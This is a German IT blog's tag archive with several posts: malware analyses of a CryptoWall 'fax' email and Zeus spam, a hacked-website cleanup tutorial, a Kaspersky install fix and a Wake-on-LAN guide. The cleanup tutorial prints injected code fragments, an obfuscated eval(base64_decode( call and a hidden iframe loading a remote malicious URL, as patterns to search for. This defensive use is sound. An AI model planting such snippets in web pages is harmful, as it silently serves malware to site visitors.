Alle Artikel über "Kaspersky"

Fehler: Kein zulässiger Kurzname für eine Datei

- - Allgemein, IT

Bei der Installation von Kaspersky Small Office Security 4 tritt unter Umständen folgendes Problem auf:

Kein zulaessiger Kurzname Kasperksy

Die Meldung „Fehler 1325. *** ist kein zulässiger Kurzname für eine Datei“ ist natürlich nicht gerade hilfreich.

Diverse Anpassungen an der Registry (z.B. Force Windows to use short filenames) bringen nicht den gewünschten Erfolg.

Im spezifischen Fall stellte sich heraus, dass der Preloader (Tool das die Installationdateien vom Kasperksy-Installationsserver „nachlädt“) nicht oder nur teilweise mit Roaming – Profilen zurechtkommt.

Abhilfe schafft in diesem Fall die Installation ohne Preloader.

Doch woher nehmen und nicht stehlen?

Der volle Installer ist dermassen gut „versteckt“, dass man ihn auch dann nicht findet, wenn man eigentlich weiss wo man suchen muss…

Kaspersky Small Office Security 4 Full Install

Für all diejenigen die sich die Suche sparen möchten – hier der direkte Link.

Ein Fax mit Folgen

- - IT, Web

Wer von einem Bekannten eine E-Mail mit dem Anhang fax-message876-792-093.zip erhält, tut gut daran diese nicht zu öffnen. Weder handelt es sich um einen Fax noch wurde die Nachricht in dessen Absicht versendet…

Im Gegensatz zum Artikel SPAM – Back to the Roots ist der Nachrichtentext diesmal etwas sinnvoller – wenn auch immer noch auf Englisch:

Besonders boshaft an dieser Version ist aber die Art der Verbreitung. Der Absender ist dem Empfänger bekannt und auch der Mailversand erfolgt über den korrekten Mailserver des Absenders. SPAM-Filter werden dadurch weitestgehend ausgehebelt. Rein technisch kommt das Mail ja vom korrekten Empfänger.

Da zum Versand der Nachricht das persönliche Adressbuch des Absenders genutzt wird, besteht von Anfang an ein Bezug zu diesem Mail – die menschliche Neugier garantiert, das ein Grossteil aller Empfänger diese Nachricht auch öffnet.

Kein(e) Fax(en)

FAX ZIPSpätestens beim Öffnen des mitgesendeten Fax müsste man misstrauisch werden. Ein Epson – Drucker der ein Fax nicht nur komprimiert und automatisch versendet, sondern daraus auch noch einen Anwendung erstellt? Erstaunlich…

 

Entsprechend wenig mit einem Fax hat der Inhalt dann tatsächlich zu tun. Öffnet man nämlich die komprimierte bot.exe passiert erst einmal – nichts. Also noch einmal öffnen…

Doch erst nach einigem Klicken und Drücken erscheint dann das „Fax“:

Fax CryptoWall3

 

Leider handelt es sich nicht um einen Fax sondern um die Ransomware CryptoWall.

Im Gegensatz zur üblichen Ransomware, die den Computer „nur sperrt“ beginnt CryptoWall sämtliche Daten zu verschlüsseln. Eine Entschlüsselung ist nur möglich, wenn der entsprechende Entschlüsselungcode gekauft wird. Dies empfiehlt sich aber nicht!  

Es gibt keine Gewissheit, dass

  • nach Bezahlung eine Enschlüsselung möglich ist
  • der Preis nach Bezahlung nicht plötzlich steigt.

Die Sinnvollste Lösung ist das professionelle Entfernen des Ransomware und das Einspielen eines aktuellen Backups.

 

Im Hintergrund

Was passiert aber eigentlich im Hintergrund?

Nachdem box.exe ausgeführt wurde, wird erst einmal der „Persönliche Verschlüsselungscode“ generiert. Die Formulierung dazu ist recht höflich gehalten („Especially for you, on our server was generated the secret key pair…“).

Schaut man sich die Netzwerkprotokolle an, wird schnell ersichtlich, dass zu Generierung der Verschlüsselung eine vorgängig gehackte WordPressite genutzt wird:

CryptoWall 3 Netzwerkprotokoll

In diesem Fall handelte es sich um 9 verschiedene WordPresssites – ein Grossteil wurde wahrscheinlich bereits im Dezember 2014 über eine Sicherheitslücke im WordPressplugin RevSlider gehackt.

CryptoWall WordPress WIrt

An diesem Punkt stellt sich dann die Frage; Kann die Verschlüsselung auch über eine solche infizierte Webseite rückgängig gemacht werden?

Leider nein – den entsprechenden Entschlüsselungscode erhält man nur über das TOR-Netzwerk – eine Rückverfolgung ist damit praktisch unmöglich.

Antivirus?

CryptoWall VirustotalDen bereits im letzen Artikel SPAM – Back to the Roots  angesprochenen „Toten Winkel“ gibt es leider auch hier. 4 Stunden nach Erhalt der E-Mail haben 9 von 57 Antivirusscannern immer noch kein Problem mit dem File fax-message876-792-093.zip.

Wer mit diesen Schutzprogrammen unterwegs ist muss sich auf seinen gesunden Menschenverstand verlassen – oder aber verfügt über ein gutes Backup!

 

 

PS: Im Wikieintrag Cryptowall 3.0 entfernen gibts einige Tipps wie man versuchen kann Daten von einem mit Cryptowall betroffenen Computer zu retten.

SPAM – Back to the roots

- - Allgemein, IT, Web

Wir bekommen täglich Dutzende von SPAM-Mails. Dass diese Mails nicht immer „harmlos“ sind und wie weit man sie zurückverfolgen kann – in diesem Artikel.

Das Mail

Ricardo SPAMAm 9. September 2014 wurde im Namen von Ricardo.ch nebenstehendes Mail versendet. Auf den ersten Blick brilliert es nicht unbedingt durch übermässig viel Inhalt – interessant ist es trotzdem.

„Bestellung“, „Ricardo“? Passt irgendwie nicht  zusammen…

RTF – Datei im Anhang? Höchst suspekt…

Nichtsdestotrotz schlägt weder Google noch Kaspersky Alarm – Grund genug dem Ganzen einmal detailliert auf die Spur zu gehen.

 

Der Absender

Eigenschaften  SPAM MailWas bereits „gefühlsmässig“ klar ist bestätigt sich nach einer kurzen Analyse. Ricardo hat mit diesem E-Mail überhaupt nichts zu tun. Im Mailheader („Kopfbereich…“) findet man bereits den ersten Hinweis – abgesendet wurde es in Spanien mithilfe von Outlook Express.

Ursprung SPAM MailWenn man noch tiefer gräbt findet man sogar den ungefähren Sendestandort – Madrid. Selbstverständlich wird man den Absender nicht (mehr) am angegebenen Ort finden – er war aber physisch oder digital zumindest einmal an diesem Ort.

 

 

Das Ziel

Spätestens an diesem Punkt stellt sich die Frage, was der Absender mit diesem Mail überhaupt bezweckt. Da wir die „Aussenstelle Spanien“ von Ricardo bereits ausgeschlossen haben, bleiben nicht viele Alternativen. Phishing kann ebenfalls ausgeschlossen werden – es würde reichen einen Link anstelle eines angehängten Dokumentes zu senden. All das führt zum Schluss, dass das angehängte RTF – Dokument alles andere als harmlos ist.

Der Köder

Virtuelle Maschine als KöderUm der Spur weiter zu folgen bleibt in diesem Fall nichts anderes übrig, als das Dokument zu öffnen. Selbstverständlich nicht in einem produktiven System sondern in einer abgesicherten Umgebung. Als Köder dient ein ungepatchtes Windows XP ohne jeglichen Virenschutz aber mit aktivierter Windows –  Firewall. Wir wollen es den „Besuchern aus Spanien“ ja nicht zu leicht machen 😉 …

Der Anhang im Detail

Mail Ihre BestellungWer jetzt eine ausgeklügelte Masche in fehlerfreiem Deutsch erwartet, wird leider enttäuscht. Das Öffnen des RTF-Dokumentes im Anhang bewirkt nämlich noch nicht viel.

Erst nachdem man einen Doppeklick auf die vermeintliche Quittung durchgeführt hat, wirds interessant.

Anhang entpacktDas File „entpackt“ sich direkt in die temporären Dateien – an sich noch nichts aussergewöhnliches. Allerdings injiziert es sich zeitgleich in Systemprozesse…

 

Eine etwas tiefere Analyse zeigt dann – es handelt sich um eine Variante des Schadprogrammes Zbot.Trojanbesser bekannt als Zeus. Primäres Ziel ist das Abgreifen von sensiblen Zugangsdaten wie etwa E-Banking.

Back to the roots?

Bis zu diesem Punkt zeigen sich keine verdächtigen Netzwerkverbindungen. Wieso auch? Es gibt ja noch nichts von Interesse.

NetzwerkverbindungenSobald aber ein potentielles E-Banking genutzt wird (im Beispiel: UBS.com) kommt Bewegung in die Sache. Die recht sonderbaren AAAA Records korrespondieren dabei immer mit einem im System erstellten Unterverzeichnis. Die wohl interessanteste Verbindung kommt aber erst gegen Schluss:
8762 426.518167000 192.168.1.1 192.168.1.80 DNS 260 Standard query response 0xaa68 CNAME p-awse-211774586.us-east-1.elb.amazonaws.com A 50.17.221.235 A 50.17.201.27 A 50.17.183.39 A 54.225.68.181 A 23.21.241.69 A 54.225.231.249 A 50.16.245.116 A 50.16.191.165

Da die UBS ihre E-Bankingplattform garantiert nicht auf Servern von Amazon hostet (!!!) ) dürfte unter diesen Adressen bereits die C&C (Command-and-Control-Engine)  der Trojaners sein. Die entsprechenden DNS – Einträge verweisen zumindest allesamt auf die Amazon Web Services…

Wieso gerade die Cloud von Amazon bei den „Bad Guys“ so beliebt ist liegt auf der Hand; Günstig, Schnell und praktisch anonym. Fliegt das Ganze auf wird einfach der Account gewechselt und das Spiel beginnt von Neuem.

Toter Winkel

Dieser Versuch an sensible Daten von Schweizer Kunden zu kommen ist zwar von der Aufmachung her eher schlampig gemacht – nichts desto trotz werden ausreichend Schweizer davon betroffen sein, dass sich auch ein solcher „Low Cost“ Angriff lohnt.

Gefährlich scheint hier insbesondere der „tote Winkel“, d.h. der Zeitraum zwischen dem Versenden und Erkennen des Schadprogrammes.  Das infizierte RTF-Dokument ging problemlos durch Googles „Cloudfilter“ und passierte auch eine aktuelle Version von Kaspersky. Erst nach ca. 11 Stunden warf Kaspersky eine Warnung aus.

Es lohnt sich also durchaus nicht alles in die Hände von Sicherheitssoftware oder der Cloud zu legen sondern ab und zu auch etwas gesunden Menschenverstand zu gebrauchen- oder?

 

PS: Das Entfernen des Trojaners ist übrigens relativ leicht – ZBot Killer von Kaspersky erledigt das schnell und schmerzlos 😉

Webseite gehackt – Was nun?

- - Tutorials, Web

Dass grosse Webseiten gehackt werden ist bekannt. Doch was passiert wenn die eigene Webseite plötzlich ungebetene Gäste hat? Woher kommen sie? Und wie verhindert man das Schlimmste?

Betroffene Systeme

Sollten Sie nur statische HTML Seiten als Grundlage für Ihre Webseite verwenden (erkennbar an der Endung einzelner Seiten, z.B. meineseite.ch/kontakt.html) besteht ein geringes Risiko, dass Sie gehackt werden. Sobald Sie aber mit dynamischen Seiten, also z.B. CMS-Lösungen wie WordPress, Joomla etc. arbeiten und im Hintergrund eine Datenbank liegt besteht ein erhöhtes Risiko, dass Sie einem Hackerangriff zum Opfer fallen.

Die Aussage, dass verbreitete CMS-Lösungen verwundbarer als Einzellösungen sind ist aber dennoch nicht richtig. Zwar sind häufig verwendete CMS-Systeme interessanter für Angreifer, andererseits werden Lücken und Fehler auch wesentlich schneller bemerkt und geschlossen. Sofern Ihr CMS entsprechend gewartet und aktualisiert wird reduziert sich das Risiko daher erheblich.

Riskofaktoren

Passwörter

Die übliche Sicherheitslücke gilt auch für Webseiten. Verwenden Sie sichere Passwörter – lang und kompliziert 😉 Als Alternative dazu eignet sich eine zweistufige Authentifzierung wie sie es vielleicht vom E-Banking her kennen. Google bietet dazu mit dem Google Authenticator eine interessante Lösung.

Plugins und Erweiterungen

Sobald ein System durch fremde Erweiterungen ergänzt wird steigt die Gefahr einer Sicherheitslücke. Verwenden Sie nur aktuelle Erweiterungen die regelmässig aktualisiert werden und sauber aufgebaut sind. Hier lohnt sich auch einen Blick auf kostenpflichtige Plugins zu werfen – Sie können sich damit eine Menge Ärger ersparen.

Themes und Designs

Wenn Sie Themes oder Designs für Ihr CMS aus dem Web beziehen, achten Sie auf die Quelle. Sie finden viele kostenpflichtige Themes „kostenlos“ im Netz – leider installieren Sie damit aber manchmal nicht nur das Design sondern auch noch ein Hintertürchen. Auch hier gilt – ein Blick auf kostenpflichtige Themes lohnt sich!

Webhoster

Webhoster gibt es mittlerweile wie Sand am Meer. Ein grosser Teil davon sind sogenannte Reseller, d.h. sie kaufen ein Hostingprodukt ein und verkaufen es weiter. Nicht immer sind die entsprechenden Reseller aber auch zuverlässig oder mit den Gefahren des Webs vertraut. Achten Sie deshalb nicht immer nur auf den Preis, sonder vor allem ob der Hoster wirklich sein eigenes Hosting betreibt und weiss was er tut.

Kenne deinen Feind

Bereits Sunzi wusste; Kenne deinen Feind! Daher ist immer auch die Identifikation der „Hacker“ ein Ziel. Glücklicherweise sind die meisten Attacken „Massenware“, d.h. sie werden nicht gezielt gegen eine Webseite gerichtet sondern gegen alle angreifbaren. Die Tools dazu werden entweder in entsprechenden Foren gekauft oder selbst erstellt.

Hack for money

Malware Webseite

Gehackte Webseiten mit Schadcode werden relativ rasch gesperrt – leider auch für potentielle Kunden oder Besucher…

Um es kurz zu machen – diese Angreifer möchten früher oder später Geld verdienen. Dementsprechend leiten Sie Ihre Besucher entweder um oder laden im Hintergrund Schadsoftware auf die Besucherrechner. Um den Profit zu maximieren laufen diese  Angriffe automatisiert ab, da sich diese Masche nur in grossen Mengen auszahlt (wenn überhaupt…). Dabei werden häufig .php-Files Ihrer Webseite verändert mit der Folge dass die ursprüngliche Webseite entweder gar nicht mehr oder nur noch eingeschränkt funktioniert.

Hack for prestige

Hack for prestige

Anders als beim obigen Beispiel bekennt sich hier eine Gruppe zum Angriff

Mittlerweile gibt es im Web Ranglisten für Gruppen welche die meisten Webseiten infiltriert haben. Der einzige Zweck eines solchen Angriffs ist demnach – Prestige! Obwohl für Besucher keine direkte Gefahr droht, wird auch hier die Webseite verändert um „zu beweisen“ dass sie gehackt wurde – selbstverständlich immer mit einigen Bemerkungen der jeweiligen Gruppe. Im Beispiel links wird netterweise sogar erwähnt wie die Seite in den „Originalzustand“ zurück versetzt werden kann.

Website desinfizieren

Da die gehackte Webseite in den meisten Fällen nicht mehr öffentlich zugänglich ist bzw. nur noch teilweise funktioniert, muss die Desinfektion auf einer anderen Ebene erfolgen – per FTP.

Zugang per FTP verschaffen

Wie man sich Zugang per FTP verschafft wird vielen bekannt sein. Falls nicht – einfach Filezilla herunterladen und mit den entsprechenden Benutzerdaten einloggen. Diese finden sich auf dem Datenblatt des Hosters.

Webseite per FTP desinfiszieren

Sobald die FTP-Verbindung steht, sollte man sich zuerst einen Überblick über die Ordnerstruktur verschaffen. Häufig befinden sich die für uns relevanten Daten im Ordner „httpdocs“. Neben einigen Unterordnern sollte dort auch eine Datei „index.php“ vorhanden sein. Diese einfach mittels Drag&Drop auf den Desktop kopieren und mit einem Texteditor öffnen (Tipp: Notepad ++ eignet sich hervorragend dafür).

 

 

 Schadcode identifizieren

Nun folgt die eigentliche Suche nach dem Schadcode. Irgendwo im Code, häufig aber direkt am Anfang des .php – Files finden sich Zeilen, die einfach nicht so recht hineinpassen wollen. Einige beginnen beispielsweise so:

<script type="text/javascript">// <![CDATA[var
eval(base64_decode(
<iframe src="http://efwel.pro/7dfs32s/" height="1" width="1" frameborder="0" scrolling="no">

Das der Schadcode nicht direkt sichtbar ist sondern verschleiert wird ergibt sich aus dem Zusammenhang – der Angreifer möchte möglichst wenig Spuren hinterlassen. So liegen dann auch die eingebundenen Schadcodeteile meist auf gekaperten Servern – und niemals direkt beim Täter.

Wem die Suche nach „verdächtigem Code“ zu mühsam ist, kann selbstverständlich auch mit Originaldateien vergleichen.

Schadcode entfernen

Da in den wenigsten Fällen nur ein File betroffen ist, müssen wir sämtliche Dateien überprüfen. Dazu setzen wir sämtliche Schritte zusammen:

  1. Schadcode entfernenDownload der gesamten Webseite via FTP (siehe Zugang per FTP)
  2. Identifizierten Schadcode in die Zwischenablage kopieren (siehe Schadcode identifizieren)
  3. Notepad ++ öffnen. Unter „Suchen“ in „Dateien suchen“ das komplette, heruntergeladene Verzeichnis nach dem Schadcode durchsuchen (Bild A)
  4. Falls mehrere Ergebnisse gefunden werden können  im selben Fenster mit „Ersetzen durch“ sämtliche Einträge gelöscht werden (Bild B).
  5. Abschliessend sollten die Dateien noch mit einem Antivirus bspw. Kaspersky gescannt werden (Findet manchmal noch Einträge…)

Hinweise

Es gibt keine Garantie, dass wirklich sämtlicher Schadcode entfernt wurde. Wer auf Nummer sicher gehen will, sollte sämtliche Files durch Originaldateien ersetzen und die Datenbank neu anbinden. Eventuell vorgenommene Modifikation an Design / CMS gehen dabei verloren. Wer über ein Backup verfügt sollte zuallererst dieses einspielen…

Um festzustellen, ob auch andere Webseiten auf demselben Hoster vom Hack betroffen sind lohnt sich ein Blick auf http://www.yougetsignal.com/tools/web-sites-on-web-server/. Dadurch kann man das Ausmass etwa abschätzen und weitere Schritte planen (z.B. Hoster informieren/wechseln)

Wer gerne den Schadcode etwas genauer analysieren möchte kann dazu diverse Onlinetools (z.B. http://www.unphp.net/) verwenden. Diese „entschlüsseln“ den Code mehr oder weniger schlecht…

Wenn die Webseite erneut gehackt wird, sollten die Risikofaktoren auf jeden Fall erneut überprüft werden

KMU und „Wake on LAN“

- - IT, Tutorials

Gerade bei KMU’s ist es häufig so, dass die Arbeitsplätze häufig stark ausgelastet sind. Die Mitarbeiter kommen am morgen, lassen den Computer den ganzen Tag an und fahren in am Abend wieder herunter. Updates und Wartungsarbeiten während der Arbeitszeit automatisch durchzuführen ist zwar möglich aber meist ungeeignet. Die optimale Lösung? Wake on LAN!

Wake on LAN?

Selten wurde ein IT-Begriff so treffend gewählt wie Wake on LAN, auf deutsch „Wecken per Lokalem Netzwerk“. Genau das passiert nämlich: Ein ausgeschalteter Computer startet aufgrund eines Signals der Netzwerkkarte. Voraussetzung dafür ist aber:

  • Kompatible Netzwerkkarte (APM/ACPI Support)
  • Sauber strukturiertes LAN
  • Software (z.B. WOL2) oder entsprechender Router (z.B. DD-WRT)

Vereinfacht sollte eigentlich jeder Computer ab ca. 2008 über eine entsprechende Netzwerkkarte verfügen. Falls nicht bekannt, einfach kurz im BIOS überprüfen bzw. aktivieren.

Anwendungsbeispiele

Mögliche Anwendungen gibt es unzählige. Hier einige (sinnvolle) Beispiele:

  • Arbeitsstationen „präventiv“ hochfahren, d.h. falls Arbeitsbeginn um 7.30 Uhr um 7.20 sämtliche Stationen hochfahren
  • Updates über Nacht einspielen
  • Schadcodescan über Nacht
  • Als Ergänzung zur Fernwartung
  • Energiemanagement (v.a. im Zusammenhang mit Virtualisierung). Server nur bei „Bedarf“ aktivieren.

Eine „elegante“ WOL Lösung mit Kaspersky

Kaspersky bietet mit dem Administrationsclient bzw. dem Security Center eine eingebaute „Wake on LAN“ – Lösung. Damit können für einzelne Gruppen oder Arbeitsstationen wiederkehrende Aufgaben erstellt werden die dann vollkommen automatisch ausgeführt werden. Diese Lösung ist „elegant“ weil keinerlei Zusatzsoftware benötigt wird sondern vorhandene Ressourcen (besser) genutzt  werden.

Ziel der Übung

Die Arbeitsstationen sollen um 1 Uhr nachts automatisch gestartet werden, ein Schadcodescan durchgeführt und sämtliche Updates eingespielt werden. Danach sollen die Computer wieder heruntergefahren werden.

Aufgabe in Kaspersky Security Center erstellen

Wake-on-LAN Aufgabe erstellenZu Beginn erstellt man eine neue Aufgabe im Kaspersky Security Center. Was genau diese Aufgabe dann erledigen soll, kann im Verlauf des Assistenten angeben werden (Update, Virusscan, Rollback…). Idealerweise wählt man etwas, das auch durchgeführt werden soll – in diesem Beispiel ein einfacher Virusscan.

 

Wake on LAN im Kaspersky Security Center aktivieren

Wake-On-LAN KasperskySobald die Aufgabe erstellt ist, müssen die Feineinstellungen vorgenommen werden. Zu diesen gelangt man durch Rechtsklick auf die entsprechende Aufgabe und auswählen der Option „Eigenschaften„.  Unter dem Menüpunkt „Zeitplan“ befindet sich der gut versteckte Punkt „Erweitert„.

 

 

Wake-On-LAN Kaspersky aktivierenHier das Häkchen bei „Computer vor dem Aufgabenstart per Wake on LAN aktivieren“ setzten. Je nach System sollte die Verzögerung angepasst werden. 5 Minuten sollten aber in den meisten Fällen ausreichen.

 

Der grösste Teil der Konfiguration ist damit bereits erledigt. Das Security Center sendet um 00.00 Uhr ein WOL – Signal an die betreffenden Computer, wartet 5 Minuten bis diese hochgefahren sind und beginnt dann mit dem Virusscan.

Weitere Aufgaben anfügen

Nun können weitere Aufgaben hinzugefügt werden – das Vorgehen bleibt dabei  immer gleich. Um also z.B. aktuelle Updates zu installieren einfach eine Aufgabe „Windows-Updates installieren“ erstellen. Idealerweise wählt man parallel dazu den Windows eigenen Updatezeitpunkt ebenfalls im gleichen Zeitrahmen (in diesem Fall 00.00 Uhr). Doppelt hält besser 😉

Security Center Aufgabe anhaengenJede nachfolgende Aufgabe sollte Bezug auf die vorhergehende nehmen – daher beim Zeitplan immer „Nach Beenden einer anderen Aufgabe“ die vorhergehende Aufgabe angeben. Bei der letzten Aufgabe kann dann unter „Erweitert“ das Häkchen „Computer nach Beendigung der Aufgabe herunterfahren“ gesetzt werden.

 

 

Ergänzende Überlegungen

Das System funktioniert sehr gut im Zusammenhang mit WSUS. Interessant ist aber auch die Aufgabe „Programm starten“ des Security Centers. Dadurch können Updates von Drittanbietern, Skripts oder Batchfiles zeitgesteuert per WOL ausgeführt werden.

Ein kritischer Faktor ist hingegen die Zeit; Scans und Updates dauern nicht immer gleich lange und sollten deshalb grosszügig kalkuliert werden.

Schlussendlich verfügt man mit dem Kaspersky Security Center aber über eine ressourcenschonende und stark individualisierbaren Lösung – perfekt für KMU’s.